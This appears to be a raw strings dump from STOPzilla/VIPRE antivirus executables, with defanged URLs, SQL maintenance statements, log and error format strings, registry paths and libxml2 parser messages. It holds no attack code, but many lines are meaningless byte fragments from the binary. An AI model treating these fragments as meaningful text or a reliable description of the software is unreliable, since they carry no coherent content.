<sql><![CDATA[DROP INDEX IF EXISTS message_pk]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_home_pk]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_read_k]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_expires_k]]></sql>
<sql><![CDATA[DROP TABLE IF EXISTS home_message]]></sql>
<sql><![CDATA[DELETE FROM stored_actions]]></sql>
<param name='home_service_url'><![CDATA[hXXps://home.is3.com]]></param>
<param name='msi_version_guid'><![CDATA[{CBE0E059-EEEA-447D-AEA3-A416112756E6}]]></param>
<param name='url_web_home'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_store'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=store&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_chat'><![CDATA[hXXp://VVV.stopzilla.com/director/?type=LIVE_CHAT&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_support'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=support&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_help'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=help&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_purchase'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=purchase&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_renew'><![CDATA[hXXp://VVV.stopzilla.com/direct-url/?page=renew&license_instance=[[license_instance]]&license_type=[[license_type]]&version=[[version]]&downloader_id=[[downloader_id]]&reseller_id=[[reseller_id]]]]></param>
<param name='url_survey'><![CDATA[hXXp://VVV.stopzilla.com/AV7-uninstall-survey/]]></param>
<param name='url_register'><![CDATA[hXXp://VVV.stopzilla.com/register/antivirus]]></param>
<param name='email_support'><![CDATA[support@stopzilla.com]]></param>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
?%? ?1?7?
8%9*9:9]9
2-343`3*414]4
67P7|7
0.080\0|1
3:3?3^3|3
>(?,?0?4?
0014181
7 7$7(7,7074787<7@7
8 8$8(8,808
9&9.979=9
88v8
2!32373[3
0&242_2{2
<3<:<?<]<
7‚8u8
1229235:5
1(2,2024282<2
=,>0>4>8>
5%6U6
7-8}8
0%1U1
5*565[5~5
:?;|;5<2=
1%2u2
< <$<(<,<0<4<8<<<@<|<
3 3$3(3,3
%hs: ApplyThreatUpdateBlocking %s; definitions unchanged from %d
%hs: ApplyThreatUpdateBlocking %s; definitions updated from %d to %d, but expected %d
%hs: ApplyThreatUpdateBlocking %s; definitions updated from %d to %d
%hs: missing full update required from version %d to (at least) %d
%hs: full update to (at least) version %d required; update to version %d found
%hs: non-sequential incremental update; expected %d, got %d
Legacy DB: Failed to compile statement '%s' [%u|%s]
Legacy DB: Failed to get value '%hs' for user '%hs' [%d|%s]
Legacy DB: Failed to get system value '%hs' [%d|%s]
Scan Thread: Awakened with scan request (0xX).
scan_clean.xml
%SystemDrive%\Program Files
%SystemDrive%\Program Files (x86)
%SystemDrive%\Windows
%SystemDrive%\programdata
%SystemDrive%\users
%SystemDrive%\documents and settings
settings.scan.low-severity
settings.scan.root-kits
settings.scan.low-priority
settings.scan.update
settings.scan.archives
settings.scan.auto-clean
settings.scan.reboot-after-clean
settings.scan.cookies
settings.scan.removable
nsettings.app.battery-power
%hs: stored scan '%s' (type %d) started.
%hs: stored scan '%s' (type %d) failed to start (ERROR)
%hs: stored scan '%s' (type %d) failed to start (BUSY)
%hs: stored scan '%s' (type %d) failed to start (CHECKING_FOR_UPDATES)
%hs: stored scan '%s' (type %d) failed to start (REBOOT_REQUIRED)
%hs: stored scan '%s' (type %d) failed to start (RUNNING)
ServerAction: Action recieved (%d).
ServerAction: Unknown action (%d).
%hs: Unexpected result from wait (%u).
updates.vipre-targets.available
GFI.Tools.Run64.exe
SBSetupDrivers.exe" /update /HIPS /ARVA /FW /AP
SBSetupDrivers.exe
VIPRE Reporting drivers already installed.
SBSetupDrivers.exe" /install /HIPS /ARVA /FW /AP
SBSetupDrivers.exe" /uninstall /HIPS /ARVA /FW /AP
Executed: (Exit Code - %u) "%s" %s
Failed to get exit code executing: "%s" %s
Wait failed executing: (0xX) "%s" %s
Error executing: "%s" %s
Session: New session (%u) (First Run: %s)
STOPzilla.exe
Session: Unable to start '%s' [%u|%s].
Session: Closed session (%u)
license.legacy_check
Licensing: Imported legacy instance key '%s'.
license.legacy_imported
dVIPRE: Request to toggle AV (Enable: %s).
VIPRE: Request to toggle AV Executing (Enable: %s).
VIPRE: AP Status change (%d).
VIPRE: AP State change (%d).
%d-%m-%Y %H:%M
System Boot: First Boot - Local Time: %s
System Boot: Rebooted - Local Time: %s
System Boot: System did not reboot - Local Time: %s.
userdata.db
VIPRE Infection: %s
%hs(%d)
[%d/%m/%Y %H:%M:%S]
(%s%s%s%s%s):
%hs: '%s' (0xX)
%hs: unable to compile empty or missing SQL statement
%hs: failed to compile '%s' [%d|%hs]
"%s" %s
explorer.exe
hkcu\software\microsoft\windows\shell\associations\urlassociations\http\userchoice
hkcr\http\shell\open\command
%hs(%d): failed [%u|%s]
%hs(%u, %u): failed [%u|%s]
Kernel32.dll
s%s%s
%s%s%s%s
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
application-pipe-server
%hs: no wrapper for opCode %u
%hs: failed to download '%s' from '%hs' [%u|%s]
%hs: failed to decode '%s' from '%hs' [%u|%s]
%hs: failed to open '%s' [%u|%s]
%hs: failed to get length of '%s' [%u|%s]
%hs: failed to verify length of '%s'; expected %I64u but got %I64u instead [%u|%s]
%hs: failed to compute hash of '%s' [%u|%s]
%hs: failed to verify hash of '%s'; expected '%hs' but got '%hs' instead [%u|%s]
%hs: downloaded '%s' from '%hs' to '%s', with size %I64u
%hs: downloaded '%s' from '%hs' to '%s', with size %I64u and %s hash '%hs'
%hs: ENCODING_ZFZIP specified; failed to open archive '%s' [%u|%s]
%hs: ENCODING_ZFZIP specified; archive does not contain '%s'
%hs: ENCODING_ZFZIP specified; failed to create/open unique file '%s' [%u|%s]
%hs: ENCODING_ZFZIP specified; failed to extract file '%s' [%u|%s]
%hs: ENCODING_ZFZIP specified; failed to write file '%s' [%u|%s]
%hs: ENCODING_ZFZIP specified; '%s' extracted from '%s' into '%s'
.available
.timestamp
%hs: component '%hs' skipped with result %d
%hs: failed to delete file '%s' [%u|%s]
%hs: no token key provided
%hs: unexpected token key '%hs'
SetProcessAffinityMask failed [%u|%s]
Working Directory: %s
CSZLogManager::Initialize(0x%X) failed [%u|%s]
ConstructLogFile(%s) failed [%u|%s]
support.phone.%
support.phone.
%hs: duplicate component (%d|%hs)
%hs: unable to parse received action content '%hs' [%u]
%hs: attempt to execute an action with no implementation!
%hs: %hs named '%s' updated to %u
external.override.scheduled.updates.interval
scheduled.phone-home.get.
Error: Unexpected message loop (0xX).
Install complete (%d).
Upgrade complete (%d).
default_external_config.xml
Default External Config: Document not found 'default_external_config.xml'.
External Config: 'external.product' found. Bypassing default external config load.
Failed to import property '%s'
Unsuccessful import of SZSetup supplied external config
Rejected external property '%s' with value '%s'
Importing external property '%s' with value '%s' as '%s'
Importing external property '%s' with value '%s'
%s Initializing
AllocConsole() failed [%u|%s]
Unhandled exception processing console command: %s
Unrecognized console command: %s
StartServiceCtrlDispatcher failed [%u|%s]
%hs(%s, %u)
%hs(%u, %u)
SetServiceStatus failed [%u|%s]
Could not create event '%s'.
Unable to start pipe server.
/sz_pipe
External Config: Failed to connect to SZSetup.exe '%s'. (%u)
%s Version: %s
%s Product Version: %s
OS: %s
CPU Type: %s
CPU Count: %d
CPU Cores: %d
CPU Logical Cores: %d
Memory Total: %d MB
Memory Available: %d MB
Memory Page File: %d MB
e%hs: Replacing client session information for process %u
%hs: Caching client session information for process %u
t%hs: discarding client information for terminating process %u
%hs: uncached client with process ID %u
%hs: discarding client information for disconnected process %u
Failed: %s
Exception: %s
%s in transaction
Licensing: Update License: valid(X) instance(%s) type(%d) start_date(%I64d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d)
INSERT INTO migration_history (version, phase) VALUES (%d, %d)
Failed to get value '%hs' for user '%hs' [%d|%s]
Failed to get system value '%hs' [%d|%s]
Failed to set value '%hs' for user '%hs' [%u|%s]
Failed to set system value '%hs' [%u|%s]
Failed to delete value '%hs' for user '%hs' [%u|%s]
Failed to delete system value '%hs' [%u|%s]
Failed to delete %hs keys %s %s [%u|%s]
Failed to write message %d [%u|%s]
'%s' cannot be opened and cannot be set aside
'%s' set aside but new file not opened
'%s' set aside and recreated
'%s' not created
No phase %d (%hs) migration necessary; current migration is %d
Phase %d (%hs) migration mismatch - DB is %d and application is %d
'%s' cannot be set aside
Migrated phase %d (%hs) from version %d to %d
SELECT value_type, value_data FROM kv_data WHERE user=? AND key=?
SELECT key, value_type, value_data FROM kv_data WHERE user=? AND key LIKE ?
REPLACE INTO kv_data (user, key, value_type, value_data) VALUES (?, ?, ?, ?)
DELETE FROM kv_data WHERE user=? AND key=?
DELETE FROM kv_data WHERE user=? AND key LIKE ?
DELETE FROM kv_data WHERE user=? AND key NOT LIKE ?
Failed to compile statement '%s' [%u|%s]
Failed to execute statement '%s' [%u|%s]
%hs: CreateFile('%s') failed [%u|%s]
CONFIG.XML
%hs: invalid option '%c' for component (%d/%hs)
%hs: option '%c' for component (%d/%hs) requires value for variable %hs
%hs: option '%c' for component (%d/%hs) contains unbalanced variable delimiters
application-pipe-client
%hs: wait failed with unexpected result %u
%hs: unhandled incoming packet - opCode(%u)
SZNetAssistant.exe
%hs: hang up request for incorrect context; expected %u and got %u
e%hs: request with context %u and payload '%hs' rejected by context %u
e%hs: no database available for SQL statement '%s'
%hs: failed to compile SQL statement '%s'
%hs: found duplicate name '%s' for type '%hs'
%hs: timer %I64u scheduled action '%s' to run in %ums
%hs: not scheduling action '%s' because it reported no future interval
%hs: executing action '%s'
%hs: no action to execute
Failed to execute function '%hs' [%u|%s]
Failed to set value '%hs' [%u|%s]
%hs: unsupported step '%hs'
sSZFileAssistant.exe
%hs: missing file '%s' required
%hs: can't compute hash of '%s'; getting file
%hs: modified file '%s' required
%hs: failed to create folder '%s' [%u|%s]
nexternal.type
external.validation.file
external.validation.version
external.timestamp
%hs: internal error - import failed
%hs: updated license type(%d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d)
%hs: failed to update license type(%d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d) [%u|%s]
%hs: duplicate region key '%s'
%hs: missing value for region '%s' and status '%hs'
%hs: invalid status value '%hs' for region '%s'
%hs: missing %d of %d expected statuses in region '%s'
%hs: assistant '%s' being destroyed with %u clients
%hs: failed to launch assistant '%s' [%u|%s]
%hs: failure after launching assistant '%s' [%u|%s]
%hs: incremented open count (%u) for assistant '%s'
%hs: reusing connection for assistant '%s'
%hs: attempt to release unopened assistant '%s'
%hs: decrementing open count (%u) for assistant '%s'
e%hs: invalid response opcode; expected %u, got %u
%hs: not closing assistant '%s' because its open count is %u
%hs: cannot reply to missing ack in assistant '%s'!
%hs: TerminateProcess failed on process %u [%u|%s]
%hs: ExecuteUserProcess('%s', '%s', %s, %u, %d, %s, &m_process, &m_pid) failed [%u|%s]
%hs: ExecuteSystemProcess('%s', '%s', %s, %s, &m_process, &m_pid) failed [%u|%s]
%hs: wait for '%s' interrupted by Close request
%hs: wait for '%s' interrupted by shutdown request
%hs: wait for '%s' interrupted by its' own termination
%hs: wait for '%s' interrupted for unexpected reason [%u]
%hs: parse error on markup '%hs' [%u|%s]
%hs: element '%hs' not supported by config object factory
%hs: failed to delete '%s' [%u|%s]
\msiexec.exe
%hs: failed to launch msiexec [%u|%s]
%hs: '%s' opened without an ack!
Global\update.binaries.skip_wait
%hs: waiting %u ms before applying updates
%hs: Warn did NOT timeout (%u)
d%hs: file '%s' not found
updates.binaries.
%hs: [empty original] %s
%hs: [remove] %s
%hs: [missing replacement] %s
%hs: [add] %s
%hs: [replace] %s
%hs: moved '%s' to '%s'
%hs: failed to move '%s' to '%s' [%u|%s]
%hs: failed to locate '%s' [%u|%s]
%hs: failed to reset dacl on '%s' [%u|%s]
%hs: failed to remove '%s' [%u|%s]
%hs: deleted '%s'
CreateInstance(CLSID_SBService) returned 0xX
CreateInstance(CLSID_SBLogger) returned 0xX
CreateInstance(CLSID_SBActiveProtection) returned 0xX
CreateInstance(CLSID_SBScanControl) returned 0xX
CreateInstance(CLSID_SBQuarantine) returned 0xX
CreateInstance(CLSID_SBRegistration) returned 0xX
CreateInstance(CLSID_SBSoftwareUpdates) returned 0xX
CreateInstance(CLSID_SBThreatDefinitions) returned 0xX
CreateInstance(CLSID_SBVipre) returned 0xX
CreateInstance(CLSID_SBWSC) returned 0xX
CreateInstance(CLSID_SBEmailAV) returned 0xX
CreateInstance(CLSID_SBFirewall) returned 0xX
CreateInstance(CLSID_SBWebFilter) returned 0xX
CreateInstance(CLSID_SBHIPS) returned 0xX
CreateInstance(CLSID_SBLanGuard) returned 0xX
Released ISBFirewallWebFilter
vipre.config.scan.known-apps.reset
%hs: VIPRE failure [0xX|%s]
VIPRE: Error communicating to set back the config: %s
Incompatibles Check: Did not find program data in '%s' or '%s'
eEnableAP() returned 0xX
DisableAP() returned 0xX
%hs: file error [%u|%s]
IncompatiblePrograms.dll
incompats.dat
Incompatibles Check: Found '%s' but not '%s'
Incompatibles Check: Found but did not load '%s' [%u|%s]
Incompatibles Check: '%s' does not contain function '%hs'
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been cleaned.%CRLFÞfinitions Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been quarantined. You can unquarantine this suspicious file from the %PRODUCT% application.%CRLFÞfinition Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been deleted.%CRLFÞfinitions Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCT% Anti-phishing removed a known bad URL from your email message. It was deleted or quarantined and replaced with this message.
SZWSC.exe
%hs: not launching '%s' - no arguments
%hs: failed to launch '%s' with arguments '%s' [%u|%s]
%hs: launched '%s' with arguments '%s'
%hs: waiting for '%s' to finish...
%hs: unexpected wait termination [%u]
%hs: OpenSCManager failed [%u|%s]
%hs: OpenService failed [%u|%s]
Advapi32.dll
%hs: unable to load Advapi32.dll
%hs: queue '%s', index %u - thread 0x%X started
%hs: queue '%s', index %u - wait failed with result %u
%hs: queue '%s', index %u - thread 0x%X ending
%hs: queue '%s' - attempt to start while abort is signalled
%hs: queue '%s', index %u - failed to start [%u|%s]
%hs: queue '%s', index %u - thread completed
\\.\pipe\
dbghelp.dll
%s%d.dmp
%s%d.log
Unhandled Exception: Code(0xX) Addess(0xX)
Windows 95
Windows 98
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows .Net
Windows Vista
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows 8
Windows 8.1
Windows 10
Windows 2012 Server
Windows 2012 Server R2
Web Server
%s ~%d MHZ
GetLogicalProcessorInformation is not supported.
Unable to determine windows version
%u.%u.%u
kernel32.dll
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Web Server Edition
Windows Server 2003 R2,
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64 Edition
Windows Server 2003,
Web Edition
Windows XP
Windows 2000
(build %d)
%hs: expected sequence number greater than or equal to %u; got %u instead
%hs: packet %u of request %u indicated no more data when %u packets remain.
[Client]: Closing connection (0xX).
[Client]: Open connection (0xX).
%hs: async read failed [%u|%s]
%hs: failed to process %u transfered bytes
a%hs: ReadFileEx failed [%u|%s]
%hs: expected packet buffer of %u bytes; got %u bytes
%hs: expected packet size in %u bytes; got %u bytes
%hs: received %u bytes; 0 expected
xx
C:\ProgramData\STOPzilla!\dumps\SZServer.exefatal
7.0.1.3
SZServer.exe

SBAMSvc.exe_3448:

.text
`.rdata
@.data
.rsrc
@.reloc
t SSh
SShTZ6
<-t~<.tz<_tv<~tr<%uB
<-tz<.tv<_tr<~tn<%uB
<.t~<_tz<~tv<%uB
<-t~<_tz<.tv<!tr<~tn<*tj<'tf<(tb<)t^
777777777
7777777
!7"77#7$%&7'()77* ,7-./017237747756
-up9}
-ud9}
!"#$%&'()* ,-./01
SSSSh`
t.ht,
t2h%D
t.htI
t.hk]
t.hjd
t.hgf
t.hDs
t.hN{
t.hQ}
t.ho!
t.hG.
t.hm4
t.hI 
t.hq-
t.VhX
8%uvP
<H.ue
u.hp22
SSSht
/u%Sj
xSSSh
FTPjKS
FtPj;S
C.PjRV
Tu.AUu
ffff28a4-0506-49af-8a0f-dfa9a4188c50
<\>.ZH
SbWF_AddPort
SbWF_ClearPorts
SbFweIds_LogPortScans
SbFwe_LogPacketsToUnopenedPorts
Unsupported XML version
XML character encoding not supported
xmlns:xsi="hXXp://VVV.w3.org/2001/XMLSchema-instance"
line:%d-'
External Entity definitions not supported
Visual C   CRT: Not enough memory to complete call to strerror.
GetProcessWindowStation
portuguese-brazilian
operator
01050;0;0
( ) / / _ _
0!0)080:0
0 0 06070>0?0
# #!#|#|#
#"#(# #{#}#
'()* ,-./0123456789:;
&!&!*! !.!.!
unterminated entity reference s
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://
PTF://
default%d
%.20s%d
http-equiv
@/:=?;#%&, 
dot operator, U 22C5 ISOamsb
tilde operator = varies with = similar to, U 223C ISOtech
proportional to, U 221D ISOtech
asterisk operator, U 2217 ISOtech
zero width joiner, U 200D NEW RFC 2070
zero width non-joiner, U 200C NEW RFC 2070
pluginurl
accesskey
onkeyup
onkeydown
onkeypress
Memory allocation failed : %s
HTTP-EQUIV
Char 0x%X out of allowed range
Unsupported encoding %s
Bytes: 0xX 0xX 0xX 0xX
Bytes: 0xX
Opening and ending tag mismatch: %s and %s
hXXp://VVV.w3.org/TR/REC-html40/loose.dtd
Element %s embeds close tag
Invalid char in CDATA 0x%X
ParsePI: PI %s space expected
ParsePI: PI %s never end ...
htmlParseCharRef: invalid xmlChar value %d
Attribute %s redefined
Unexpected end tag : %s
Tag %s invalid
Couldn't find end of Start Tag %s
Internal error, xmlCopyCharMultiByte 0x%X out of bound
encoding not supported %s
new input from entity: %s
Cannot parse entity %s
Internal entity %s without content !
Internal parameter entity %s without content !
Predefined entity %s without content !
new input from file: %s
failed to load external entity "%s"
Found NULL content in content model of %s
Found PCDATA in content model of %s
ContentModel broken for element %s
Cannot create automata for element %s
Content model of %s is not determinist: %s
Redefinition of element %s
Element %s has too many ID attributes defined : %s
Attribute %s of %s: invalid default value
Attribute %s of element %s: already defined
Element %s has too may ID attributes defined : %s
xmlAddNotationDecl: %s already defined
ID %s already defined
NOTATION %s is not declared
ENTITY attribute %s reference an unknown entity "%s"
ENTITY attribute %s reference an entity "%s" of wrong type
ENTITIES attribute %s reference an unknown entity "%s"
ENTITIES attribute %s reference an entity "%s" of wrong type
NOTATION attribute %s reference an unknown notation "%s"
standalone: %s on %s value had to be normalized based on external subset declaration
Syntax of default value for attribute %s of %s is not valid
ID attribute %s of %s is not valid must be #IMPLIED or #REQUIRED
Element %s has %d ID attribute defined in the internal subset : %s
Element %s has %d ID attribute defined in the external subset : %s
Element %s has ID attributes defined in the internal and external subset : %s
Default value "%s" for attribute %s of %s is not among the enumerated set
Definition of %s has duplicate references of %s
Definition of %s has duplicate references of %s:%s
Definition of %s has duplicate references to %s
Definition of %s has duplicate references to %s:%s
No declaration for attribute %s of element %s
Syntax of value for attribute %s of %s is not valid
Value for attribute %s of %s is different from default "%s"
Value "%s" for attribute %s of %s is not a declared Notation
Value "%s" for attribute %s of %s is not among the enumerated notations
Value "%s" for attribute %s of %s is not among the enumerated set
Value for attribute %s of %s must be "%s"
No declaration for attribute xmlns:%s of element %s
No declaration for attribute xmlns of element %s
Syntax of value for attribute xmlns:%s of %s is not valid
Syntax of value for attribute xmlns of %s is not valid
Value for attribute xmlns:%s of %s is different from default "%s"
Value for attribute xmlns of %s is different from default "%s"
Value "%s" for attribute xmlns:%s of %s is not a declared Notation
Value "%s" for attribute xmlns of %s is not a declared Notation
Value "%s" for attribute xmlns:%s of %s is not among the enumerated notations
Value "%s" for attribute xmlns of %s is not among the enumerated notations
Value "%s" for attribute xmlns:%s of %s is not among the enumerated set
Value "%s" for attribute xmlns of %s is not among the enumerated set
Value for attribute xmlns:%s of %s must be "%s"
Value for attribute xmlns of %s must be "%s"
Element %s content does not follow the DTD, expecting %s, got %s
Element content does not follow the DTD, expecting %s, got %s
No declaration for element %s
Element %s was declared EMPTY this one has content
Element %s was declared #PCDATA but contains non text nodes
Element %s is not declared in %s list of possible children
standalone: %s declared in the external subset contains white spaces nodes
Element %s does not carry attribute %s
Element %s does not carry attribute %s:%s
Element %s required attribute %s:%s has no prefix
Element %s required attribute %s:%s has different prefix
Element %s namespace name for default namespace does not match the DTD
Element %s namespace name for %s does not match the DTD
root and DTD name do not match '%s' and '%s'
attribute %s line %d references an unknown ID "%s"
IDREF attribute %s references an unknown ID "%s"
IDREFS attribute %s references an unknown ID "%s"
xmlValidateAttributeCallback(%s): internal error
attribute %s: could not find decl for element %s
NOTATION attribute %s declared for EMPTY element %s
%s:%d:
Entity: line %d:
element %s:
&#%d;
&#x%X;
:/?_.#&;=
%s: out of memory
Entity(%s) document marked standalone but requires external subset
Failure to process entity %s
Entity(%s) already defined in the internal subset
Entity(%s) already defined in the external subset
SAX.xmlSAX2EntityDecl(%s) called while not in subset
SAX.xmlSAX2AttributeDecl(%s) called while not in subset
SAX.xmlSAX2ElementDecl(%s) called while not in subset
SAX.xmlSAX2NotationDecl(%s) externalID or PublicID missing
SAX.xmlSAX2NotationDecl(%s) called while not in subset
SAX.xmlSAX2UnparsedEntityDecl(%s) called while not in subset
invalid namespace declaration '%s'
Avoid attribute ending with ':' like '%s'
xmlns: %s not a valid URI
xmlns: URI %s is not absolute
Empty namespace name for prefix %s
xmlns:%s: %s not a valid URI
xmlns:%s: URI %s is not absolute
Namespace prefix %s of attribute %s is not defined
Attribute %s in %s redefined
xml:id : attribute value %s is not an NCName
standalone: attribute %s on %s defaulted from external subset
Namespace prefix %s is not defined
Namespace prefix %s was not found
Attempt to load network entity %s
Operation timed out
Broken pipe
Operation not permitted
Inappropriate I/O control operation
Not supported
Operation in progress
Operation canceled
creating HTTP output context
xmlIOHTTPWrite: %s
%s '%s'.
xmlIOHTTPCloseWrite: %s '%s' %s '%s'.
failed. HTTP return code:
xmlIOHTTPCloseWrite: HTTP '%s' of %d %s
'%s' %s %d
failed to load HTTP resource "%s"
failed to load HTTP resource
Unknown encoding %s
xmlRegisterCharEncodingHandler: Too many handler registered, see %s
0xX 0xX 0xX 0xX
input conversion failed due to input error, bytes %s
output conversion failed due to conv error, bytes %s
Attribute %s:%s redefined
conditional section INCLUDE or IGNORE keyword expected
Pbm popping %d NS
Excessive depth in document: %d use XML_PARSE_HUGE option
Popping input %d
%s(%d):
Pushing input %d : %.30s
xmlParseCharRef: invalid xmlChar value %d
xmlParseStringCharRef: invalid xmlChar value %d
new blanks wrapper for entity: %s
PEReference: %s
PEReference: %%%s; not found
PEReference: %s is not a parameter entity
Name %s is not XML Namespace compliant
EntityValue: '%c' forbidden except for entities references
PCDATA invalid Char value %d
xmlParseComment: invalid xmlChar value %d
colon are forbidden from PI names '%s'
Catalog PI syntax error: %s
colon are forbidden from notation names '%s'
colon are forbidden from entities names '%s'
Invalid URI: %s
xmlParseEntityDecl: entity %s not terminated
standalone: attribute notation value token %s duplicated
standalone: attribute enumeration value token %s duplicated
xmlParseElementChildrenContentDecl : depth %d too deep, use XML_PARSE_HUGE
xmlParseElementChildrenContentDecl : '%c' expected
xmlParseElementContentDecl : %s '(' expected
Entity '%s' failed to parse
Entity '%s' not defined
Entity reference to unparsed entity %s
Attribute references external entity '%s'
'<' in entity '%s' is not allowed in attributes values
Attempt to reference the parameter entity '%s'
Internal: %%%s; is not a parameter entity
Reading %s entity content input
xmlLoadEntityContent: invalid char value %d
%%%s; is not a parameter entity
Specification mandate value for attribute %s
Malformed value for xml:lang : %s
Invalid value "%s" for xml:space : "default" or "preserve" expected
Opening and ending tag mismatch: %s line %d and %s
Failed to parse QName '%s'
Failed to parse QName '%s:'
Failed to parse QName '%s:%s:'
xmlns: '%s' is not a valid URI
hXXp://VVV.w3.org/2000/xmlns/
xmlns:%s: Empty XML namespace is not allowed
xmlns:%s: '%s' is not a valid URI
Namespace prefix %s for %s on %s is not defined
Namespaced Attribute %s in '%s' redefined
Namespace prefix %s on %s is not defined
Couldn't find end of Start Tag %s line %d
Premature end of data in tag %s line %d
Unsupported version '%s'
Free catalog entry %s
%s entry lacks '%s'
Found %s: '%s' '%s'
Found %s: '%s'
%s entry '%s' broken ?: %s
Invalid value for prefer: '%s'
Failed to parse catalog %s
%d Parsing catalog %s
File %s is not an XML Catalog
Found %s in file hash
%s not found in file hash
%s added to file hash
Detected recursion in catalog %s
Found system match %s, using %s
Using rewriting rule %s
Trying system delegate %s
Found public match %s
Trying public delegate %s
Found URI match %s
Trying URI delegate %s
Public URN ID %s expanded to NULL
Public URN ID expanded to %s
System URN ID %s expanded to NULL
System URN ID expanded to %s
URN ID %s expanded to NULL
URN ID expanded to %s
Resolve: pubID %s sysID %s
Resolve: pubID %s
Resolve: sysID %s
Resolve URI %s
libxml2.dll
Adding document catalog %s
Local Resolve: pubID %s sysID %s
Local Resolve: pubID %s
Local Resolve: sysID %s
failed to compile: %s
creating execution context
ftp_proxy
FTP_PROXY
ftp_proxy_user
ftp_proxy_password
allocating FTP context
USER %s
PASS anonymous@
PASS %s
SITE %s
USER anonymous@%s
USER %s@%s
FTP server asking for ACCNT on anonymous
%u,%u,%u,%u,%u,%u
PORT %d,%d,%d,%d,%d,%d
RETR %s
http_proxy
HTTP_PROXY
HTTP/
error connecting to HTTP server
Not a valid HTTP URI
%s hXXp://%s:%d%s
%s hXXp://%s%s
%s %s
HTTP/1.0
Host: %s
Host: %s:%d
Content-Type: %s
Content-Length: %d
Invalid operand
Missing closing curly brace
hXXp://relaxng.org/ns/structure/1.0
hXXp://VVV.w3.org/2001/XMLSchema
SupplementalMathematicalOperators
MathematicalOperators
hXXp://VVV.w3.org/2001/XMLSchema-instance
%d.%d.%d.%d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
FenumOperation
AllowedOperations
MonitoredURL
HttpServerConfig\HttpServerConfig.cpp
HttpServerConfig
18446744073709551615
URL="
-2147483648
2147483647
enumOperation="
Password
Port
4294967295
4.0.0
LanGuardConfig\LanGuardConfig.cpp
Port="
Password="
ProductKey
Web_Alerts
port
fileurl
passwordHistory
minimumPasswordAge
maximumPasswordAge
minimumPasswordLength
transport
LoginShell
BadPasswordsCount
PasswordAge
passworded
PrimaryKey
udp_ports
ports
transports
iswindows
Importance
SystemUpdateScanResults\SystemUpdateScanResults.cpp
Importance="
</iswindows>
<iswindows>
PrimaryKey="
passworded="
</PasswordAge>
<PasswordAge>
</BadPasswordsCount>
<BadPasswordsCount>
</LoginShell>
<LoginShell>
transport="
</minimumPasswordLength>
<minimumPasswordLength>
</maximumPasswordAge>
<maximumPasswordAge>
</minimumPasswordAge>
<minimumPasswordAge>
</passwordHistory>
<passwordHistory>
</url>
<url>
</fileurl>
<fileurl>
</Url>
<Url>
ProductKey="
RegistrationKey
RegistrationKey="
Telemetry\Telemetry.cpp
LanGuardToolCfg_Updates\LanGuardToolCfg_Updates.cpp
LanGuardResults\LanGuardResults.cpp
LogToWindowsEventLog
LogToWindowsEventLog="
ServiceConfig\ServiceConfig.cpp
ScanConfig\ScanConfig.cpp
SendFileURL
ThreatNetQueryURL
ThreatNetURL
TelemetryURL
TelemetryURL="
ThreatNetURL="
ThreatNetQueryURL="
SendFileURL="
ThreatNetConfig\ThreatNetConfig.cpp
ThreatNetResponse\ThreatNetResponse.cpp
ntosExport
ntdllExport
reportonly
authorURL
RegKey
MsgID
ThreatNetTransfer\ThreatNetTransfer.cpp
MsgID="
RegKey="
</authorURL>
<authorURL>
reportonly="
ntdllExport="
ntosExport="
AutoGetURL
UpdateURL
RegistrationURL
RegistrationURL="
UpdateURL="
AutoGetURL="
RegistrationConfig\RegistrationConfig.cpp
BaseURL
ThreatDefinitionsConfig\ThreatDefinitionsConfig.cpp
BaseURL="
NVPairs\NVPairs.cpp
APEvent\APEvent.cpp
ScanResults\ScanResults.cpp
QuarantineFile\QuarantineFile.cpp
ProcessList\ProcessList.cpp
SoftwareUpdateConfig\SoftwareUpdateConfig.cpp
BadUrl
SocialWatchHistory\SocialWatchHistory.cpp
Url="
</BadUrl>
<BadUrl>
WindowsLiveMailClientEnabled
BadUrlActionEnum
BadUrlCheckingEnabled
BadUrlReplacementText
CloseEmailWindowMsg
